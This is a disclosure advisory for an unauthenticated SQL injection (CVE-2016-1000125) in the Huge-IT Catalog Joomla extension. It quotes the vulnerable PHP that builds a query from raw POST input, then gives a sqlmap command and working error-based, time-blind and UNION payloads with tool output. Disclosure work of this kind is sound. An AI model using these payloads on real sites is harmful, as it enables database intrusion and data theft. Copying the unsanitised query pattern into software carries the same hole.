Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7for Joomla
Author: Larry W. Cashdollar, @_larry0
Date:2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified:2016-09-17
Vendor Contact: info@huge-it.com
Description:
Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a
variety of catalogs with a specific product category. To imagine isnot difficult, to use is even easier.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php.
Vulnerable Code in: ajax_url.php
11 define('_JEXEC',1);12 defined('_JEXEC')or die('Restircted access');...308} elseif ($_POST["post"]=="load_more_elements_into_catalog"){309 $catalog_id = $_POST["catalog_id"];310 $old_count = $_POST["old_count"];311 $count_into_page = $_POST["count_into_page"];312 $show_thumbs = $_POST["show_thumbs"];313 $show_description = $_POST["show_description"];314 $show_linkbutton = $_POST["show_linkbutton"];315 $parmalink = $_POST["parmalink"];316 $level = $_POST['level'];...359 $query->select('*');360 $query->from('#__huge_it_catalog_products');361 $query->where('catalog_id ='. $catalog_id);362 $query->order('ordering asc');363 $db->setQuery($query, $from, $count_into_page);
CVE-ID: CVE-2016-1000125
Export: JSON TEXT XML
Exploit Code:
• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php'--data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"--level=5--risk=3
•
• Parameter:#1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
•
• Type: AND/OR time-based blind
• Title: MySQL >=5.0.12 time-based blind - Parameter replace
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
•
• Type: UNION query
• Title: Generic UNION query (random number)-15 columns
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
• ---
• [16:48:10][INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0(jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >=5.0.12
• [16:48:10][WARNING] HTTP error codes detected during run:
• 500(Internal Server Error)-6637 times
• [16:48:10][INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
•
• [*] shutting down at 16:48:10
•
Advisory: http://www.vapidlabs.com/advisory.php?v=171
